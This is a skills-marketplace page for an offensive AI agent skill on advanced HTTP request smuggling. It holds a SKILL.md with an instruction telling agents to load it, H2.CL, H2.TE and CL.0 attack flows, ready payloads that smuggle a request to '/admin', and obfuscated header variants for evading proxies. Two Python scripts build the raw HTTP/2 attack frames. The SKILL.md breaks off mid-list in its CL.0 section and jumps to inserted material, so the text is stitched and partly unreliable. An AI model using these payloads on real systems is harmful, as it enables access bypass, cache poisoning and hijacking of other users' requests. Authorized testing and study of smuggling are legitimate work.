
Request Smuggling
Craft HTTP/2 and advanced desync smuggling payloads when auditing reverse proxies, CDNs, and dual-stack front/back-end HTTP parsers.
Overview
Request Smuggling (advanced variants) is an agent skill for the Ship phase that documents HTTP/2 and advanced desync smuggling payloads for authorized security testing of proxies and origins.
Install
npx skills add https://github.com/yaklang/hack-skills --skill request-smuggling
What is this skill?
- H2.CL and H2.TE byte-level desync flows with front-end H2 to back-end H1 downgrade
- CL.0 desync, Fat GET smuggling, and smuggling-to-cache-poisoning chains
- Client-side desync (CSD) and CDN/reverse-proxy behavior matrices
- Assumes base CL.TE / TE.CL / TE.TE fundamentals from the parent request-smuggling SKILL.md
- Structured attack-flow diagrams for content-length vs frame-boundary disagreements
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You know classic TE/CL smuggling but lack byte-accurate H2.CL, Fat GET, and cache-poisoning chain recipes for your specific CDN and downgrade topology.
Who is it for?
Builders or consultants running structured offensive tests on API gateways, CDNs, and split H2/H1 stacks after fundamentals are loaded.
Skip if: you would be running it casually against production systems you are not authorized to test, you are a beginner still learning HTTP basics, or your team only needs dependency scanning rather than manual protocol abuse.
When should I use this skill?
Load when you need H2.CL/H2.TE byte-level payloads, CL.0 desync, Fat GET smuggling, smuggling→cache poisoning chains, client-side desync flows, or CDN/reverse-proxy behavior matrices, after the main SKILL.md fundamentals are loaded.
What do I get? / Deliverables
You leave with concrete H2 and desync payload shapes and behavior matrices to reproduce request-queue desyncs and validate fixes on permitted targets.
- Reproducible smuggling payload templates
- Documented desync hypotheses for proxy/downgrade paths
Journey fit
Canonical shelf is Ship → security because smuggling is exercised during pre-release offensive testing and hardening of edge and origin stacks. Security subphase covers vulnerability research and exploit-path validation before production exposure.
How it compares
Specialized offensive protocol playbook—not a generic OWASP checklist skill or an automated DAST integration.
Common Questions / FAQ
Who is request-smuggling (advanced variants) for?
Security-minded solo builders and indie pentesters auditing reverse proxies and APIs who already use the main yaklang request-smuggling SKILL.md for CL.TE fundamentals.
When should I use request-smuggling (advanced variants)?
During Ship security reviews when you need H2.CL/H2.TE payloads, CL.0 or Fat GET smuggling, smuggling-to-cache-poisoning chains, or CDN behavior matrices on a scoped test environment.
Is request-smuggling (advanced variants) safe to install?
The skill content is dual-use offensive knowledge; review the Security Audits panel on this Prism page and only run techniques on systems you are explicitly allowed to test.
SKILL.md
# HTTP/2 Smuggling Variants & Advanced Desync Techniques

> **AI LOAD INSTRUCTION**: Load this when you need H2.CL/H2.TE byte-level payloads, CL.0 desync, Fat GET smuggling, smuggling→cache poisoning chains, client-side desync (CSD) flows, or CDN/reverse-proxy behavior matrices. Assumes the main [SKILL.md](./SKILL.md) is already loaded for CL.TE, TE.CL, TE.TE fundamentals.

---

## 1. H2.CL — HTTP/2 Content-Length Desync

### 1.1 Concept

The front-end speaks HTTP/2 with the client and downgrades to HTTP/1.1 toward the back-end. HTTP/2 delimits the body with the length field of each DATA frame, but the proxy may also forward the request's `content-length` header to the back-end. RFC 9113 requires an HTTP/2 endpoint to treat a `content-length` that does not match the total DATA payload as a malformed message; a front-end that skips that check and forwards the header unchanged lets the two disagree. The back-end then trusts `content-length` while the front-end trusted the frame boundary, and every byte after the declared body is left on the back-end connection.

### 1.2 Attack Flow

```
Client ──[HTTP/2]──> Front-end proxy ──[HTTP/1.1]──> Back-end

1. Client sends H2 POST with:
   - content-length header: 0
   - H2 DATA frame containing:
     "GET /admin HTTP/1.1\r\nHost: target\r\n\r\n"

2. Front-end (H2): reads the entire DATA frame as the body of the first request
   → forwards it to the back-end as an HTTP/1.1 POST, content-length: 0 included

3. Back-end (H1): sees content-length: 0 → treats the body as empty
   → the remaining bytes on the connection:
     "GET /admin HTTP/1.1\r\nHost: target\r\n\r\n"
   → parsed as a second request
```

No chunk terminator (`0\r\n\r\n`) belongs in the H2.CL body: the back-end reads zero body bytes, so whatever follows the POST headers is parsed directly as the next request line. The terminator is only needed for the H2.TE variant.

### 1.3 Byte-Level Payload

```http
:method: POST
:path: /
:authority: target.example
content-type: application/x-www-form-urlencoded
content-length: 0

GET /admin HTTP/1.1
Host: target.example

```

The H2 DATA frame carries the entire body including the smuggled `GET /admin` request. The `content-length: 0` header tells the back-end the POST body is empty.

### 1.4 Confirming H2.CL

```
Step 1: Send an H2 POST with content-length: 0 and the single byte "G" as the DATA frame body
Step 2: Send a normal GET / immediately afterwards on the same front-end connection
        (the front-end must reuse the same back-end connection; whichever request
        lands on it next, yours or a victim's, is the one that gets corrupted)
Step 3: The back-end parses "GGET / HTTP/1.1" → 405 or 400 on the second response → confirmed

Timing version:
- Smuggle "GET /sleep?delay=10 HTTP/1.1..." (any endpoint that responds slowly)
- The next request on that back-end connection is delayed → confirmed
```

---

## 2. H2.TE — HTTP/2 Transfer-Encoding Desync

### 2.1 Concept

`transfer-encoding` is a connection-specific header field: the HTTP/2 specification forbids sending it, and an intermediary that downgrades to HTTP/1.1 is required to strip it. Some front-end proxies do not. If the back-end sees `transfer-encoding: chunked` in the downgraded H1 request, it uses chunked parsing while the front-end used the H2 frame boundary.

### 2.2 Attack Flow

```
Client ──[HTTP/2]──> Front-end proxy ──[HTTP/1.1]──> Back-end

1. Client sends H2 POST with:
   - transfer-encoding: chunked (forbidden in H2, but the proxy passes it through)
   - H2 DATA frame body:
     "0\r\n\r\nGET /admin HTTP/1.1\r\nHost: target\r\n\r\n"

2. Front-end: ignores transfer-encoding (H2 doesn't use it)
   → forwards the entire DATA frame as the H1 body

3. Back-end: sees transfer-encoding: chunked → parses "0\r\n\r\n" as end-of-chunks
   → remaining bytes = smuggled request
```

### 2.3 Byte-Level Payload

```http
:method: POST
:path: /
:authority: target.example
content-type: application/x-www-form-urlencoded
transfer-encoding: chunked

0

GET /admin HTTP/1.1
Host: target.example

```

### 2.4 Variations

Some proxies normalize or strip a clean `transfer-encoding` header but pass an obfuscated one. Try:

```http
transfer-encoding: chunked
Transfer-Encoding: chunked      (capitalized name; H2 requires lowercase field names)
transfer-encoding: identity     (should be stripped but may pass through)
transfer-encoding:  chunked     (extra whitespace around the value)
transfer-encoding: chunked      (trailing whitespace after the value)
```

Record which of these the front-end strips, rewrites or forwards unchanged; that is the per-CDN behavior matrix.

---

## 3. CL.0 — Back-End Ignores Content-Length

### 3.1 Concept

CL.0 occurs when the back-end ignores the `content-length` header entirely and reads the body length as 0, regardless of what `content-length` says. The remaining body bytes stay in the socket buffer and are parsed as the next request on that connection.

Unlike CL.TE or TE.CL, CL.0 does NOT require `transfer-encoding`. It exploits endpoints that simply don't consume the body.

### 3.2 Vulnerable Conditions

- Endpoints that return a response before reading the full body (e.g., redirects, 301/302)
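The byte-level payloads in 1.3 and 2.3 are shown above as header/body listings; the following added example (written for this page, not code from the yaklang skill) produces the actual HTTP/2 frames for both, with HPACK done by hand using the literal-without-indexing representation, then decodes them again to expose the inconsistency a downgrading front-end should have rejected: the DATA frame length versus the forwarded `content-length`, or a forwarded `transfer-encoding`. `target.example` and `/admin` are the page's placeholders; nothing is sent over the network.

```python
"""Build and inspect the raw HTTP/2 frames for the H2.CL and H2.TE payloads.

Added example, not part of the yaklang skill. Standard library only: HPACK is
encoded with 'literal header field without indexing, new name', which every
HPACK decoder must accept, so no static-table or Huffman support is needed.
"""
import struct

FRAME_DATA, FRAME_HEADERS, FRAME_SETTINGS = 0x0, 0x1, 0x4
FLAG_END_STREAM, FLAG_END_HEADERS = 0x1, 0x4
CONNECTION_PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"

# Placeholder host and path taken from the page's payload shape (constructed input).
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: target.example\r\n\r\n"
COMMON_HEADERS = [
    (":method", "POST"), (":path", "/"), (":authority", "target.example"),
    ("content-type", "application/x-www-form-urlencoded"),
]


def hpack_literal(name: str, value: str) -> bytes:
    """RFC 7541 6.2.2: a 0x00 byte, then two raw (non-Huffman) string literals."""
    def literal(s: bytes) -> bytes:
        if len(s) >= 127:  # single-byte 7-bit length prefix is enough here
            raise ValueError("multi-byte length prefix not implemented")
        return bytes([len(s)]) + s
    return b"\x00" + literal(name.encode()) + literal(value.encode())


def frame(ftype: int, flags: int, stream_id: int, payload: bytes) -> bytes:
    """RFC 9113 4.1 frame: 24-bit length, type, flags, R bit + 31-bit stream id."""
    head = struct.pack(">I", len(payload))[1:] + bytes([ftype, flags])
    return head + struct.pack(">I", stream_id & 0x7FFFFFFF) + payload


def h2_request(headers, body: bytes, stream_id: int = 1) -> bytes:
    """One HEADERS frame (END_HEADERS) followed by one DATA frame (END_STREAM)."""
    block = b"".join(hpack_literal(n, v) for n, v in headers)
    return (frame(FRAME_HEADERS, FLAG_END_HEADERS, stream_id, block)
            + frame(FRAME_DATA, FLAG_END_STREAM, stream_id, body))


def h2_cl_payload() -> bytes:
    # content-length: 0 contradicts the DATA frame, which carries the smuggled request.
    return h2_request(COMMON_HEADERS + [("content-length", "0")], SMUGGLED)


def h2_te_payload() -> bytes:
    # transfer-encoding is forbidden in H2; body = terminating chunk + smuggled request.
    return h2_request(COMMON_HEADERS + [("transfer-encoding", "chunked")],
                      b"0\r\n\r\n" + SMUGGLED)


def connection_bytes(request: bytes) -> bytes:
    """Wire bytes for a fresh H2 connection: preface, empty SETTINGS, then the request."""
    return CONNECTION_PREFACE + frame(FRAME_SETTINGS, 0, 0, b"") + request


def decode_frames(raw: bytes):
    """Yield (type, flags, stream_id, payload) for each frame in raw."""
    i = 0
    while i < len(raw):
        length = int.from_bytes(raw[i:i + 3], "big")
        ftype, flags = raw[i + 3], raw[i + 4]
        sid = int.from_bytes(raw[i + 5:i + 9], "big") & 0x7FFFFFFF
        yield ftype, flags, sid, raw[i + 9:i + 9 + length]
        i += 9 + length


def decode_literal_block(block: bytes):
    """Decode a header block made only of the representation hpack_literal emits."""
    fields, i = [], 0
    while i < len(block):
        if block[i] != 0x00:
            raise ValueError("only literal-without-indexing / new-name is supported")
        nlen = block[i + 1]
        name = block[i + 2:i + 2 + nlen]
        i += 2 + nlen
        vlen = block[i]
        value = block[i + 1:i + 1 + vlen]
        i += 1 + vlen
        fields.append((name.decode(), value.decode()))
    return fields


def length_disagreement(request: bytes):
    """Return (DATA bytes the front-end reads, content-length the back-end will
    honour or None, transfer-encoding forwarded or None). A DATA total that
    differs from content-length, or any transfer-encoding at all, is what the
    H1 downgrade turns into a desync."""
    headers, data_len = {}, 0
    for ftype, _flags, _sid, payload in decode_frames(request):
        if ftype == FRAME_HEADERS:
            headers = dict(decode_literal_block(payload))
        elif ftype == FRAME_DATA:
            data_len += len(payload)
    cl = headers.get("content-length")
    return data_len, (int(cl) if cl is not None else None), headers.get("transfer-encoding")


if __name__ == "__main__":
    for name, req in (("H2.CL", h2_cl_payload()), ("H2.TE", h2_te_payload())):
        print(name, length_disagreement(req))
    print(connection_bytes(h2_cl_payload()).hex())
```

A compliant front-end fails the H2.CL request at the `length_disagreement` check (DATA total 45 bytes against `content-length: 0`) and rejects the H2.TE request for carrying a connection-specific field; the vulnerable ones described above forward both. Replace the `SMUGGLED` bytes to build the "G" probe from section 1.4.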
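The attack flows in 1.2, 2.2 and 3.1 all end with the same event: the back-end stops reading the first request early and parses the leftover bytes as a second one. This added example (written for this page, not code from the yaklang skill) models that back-end side of the downgrade for all three variants with a small HTTP/1.1 reader that can honour `Content-Length`, honour chunked `Transfer-Encoding`, or ignore the body entirely (CL.0), and also reproduces the `GGET` probe from section 1.4. The downgraded request bytes are constructed inline; `target.example` and `/admin` are the page's placeholders.

```python
"""Model how a downgraded HTTP/1.1 back-end splits the bytes a front-end forwards.

Added example, not part of the yaklang skill. The front-end has already
forwarded the whole DATA frame as the body; the only question is where the
back-end believes the first request ends. Everything after that point is
parsed as the next request on the same back-end connection.
"""

# Constructed placeholder payload following the page's shape.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: target.example\r\n\r\n"


def split_head(raw: bytes):
    """Return (request line, {lowercase header name: value}, body start offset)."""
    head_end = raw.index(b"\r\n\r\n") + 4
    lines = raw[:head_end - 4].split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return lines[0].decode(), headers, head_end


def read_chunked(body: bytes):
    """Consume chunks up to and including the 0-size terminator (plus any
    trailers). Returns (decoded body, number of bytes consumed)."""
    out, i = b"", 0
    while True:
        eol = body.index(b"\r\n", i)
        size = int(body[i:eol].split(b";")[0], 16)  # chunk extensions ignored
        i = eol + 2
        if size == 0:
            while body[i:i + 2] != b"\r\n":  # skip trailer lines, if any
                i = body.index(b"\r\n", i) + 2
            return out, i + 2
        out += body[i:i + size]
        i += size + 2  # chunk data plus its CRLF


def backend_read(raw: bytes, mode: str):
    """Parse one request from raw as a back-end in the given mode would and
    return (request line, body, leftover). leftover is what that back-end will
    parse as the *next* request on the connection.
      "cl":  honour content-length             (H2.CL after downgrade)
      "te":  honour transfer-encoding: chunked (H2.TE after downgrade)
      "cl0": never read the body, respond at once (CL.0)"""
    line, headers, body_start = split_head(raw)
    rest = raw[body_start:]
    if mode == "cl0":
        body, used = b"", 0
    elif mode == "te" and headers.get("transfer-encoding") == "chunked":
        body, used = read_chunked(rest)
    else:
        n = int(headers.get("content-length", "0"))
        body, used = rest[:n], n
    return line, body, rest[used:]


def downgraded(extra_header: str, data_frame: bytes) -> bytes:
    """The HTTP/1.1 bytes a front-end emits when it rebuilds the H2 request,
    forwards the given header unchanged and uses the whole DATA frame as body.
    Constructed here; real front-ends add hop-by-hop headers of their own."""
    return (b"POST / HTTP/1.1\r\nHost: target.example\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            + extra_header.encode() + b"\r\n\r\n" + data_frame)


def next_request_line(leftover: bytes):
    """Request line the back-end parses from the leftover, or None if nothing is left."""
    return split_head(leftover)[0] if b"\r\n\r\n" in leftover else None


def demo():
    """Map each variant to (first request line seen, request line parsed from the leftover)."""
    cases = {
        "H2.CL": (downgraded("Content-Length: 0", SMUGGLED), "cl"),
        "H2.TE": (downgraded("Transfer-Encoding: chunked", b"0\r\n\r\n" + SMUGGLED), "te"),
        "CL.0": (downgraded("Content-Length: %d" % len(SMUGGLED), SMUGGLED), "cl0"),
    }
    results = {}
    for name, (wire, mode) in cases.items():
        first, _body, leftover = backend_read(wire, mode)
        results[name] = (first, next_request_line(leftover))
    return results


def confirm_probe() -> str:
    """Section 1.4's probe: a one-byte "G" body left on the connection is glued
    onto the next legitimate request, producing an invalid method."""
    _first, _body, leftover = backend_read(downgraded("Content-Length: 0", b"G"), "cl")
    follow_up = b"GET / HTTP/1.1\r\nHost: target.example\r\n\r\n"
    return next_request_line(leftover + follow_up)


if __name__ == "__main__":
    for name, (first, second) in demo().items():
        print(f"{name}: back-end saw {first!r}, then {second!r}")
    print("probe ->", confirm_probe())
```

Note the CL.0 case: the forwarded `Content-Length` is correct, and a back-end in `"cl"` mode leaves nothing behind; the desync exists only because the endpoint answers without consuming the body, which is why CL.0 needs no `transfer-encoding` trick at all.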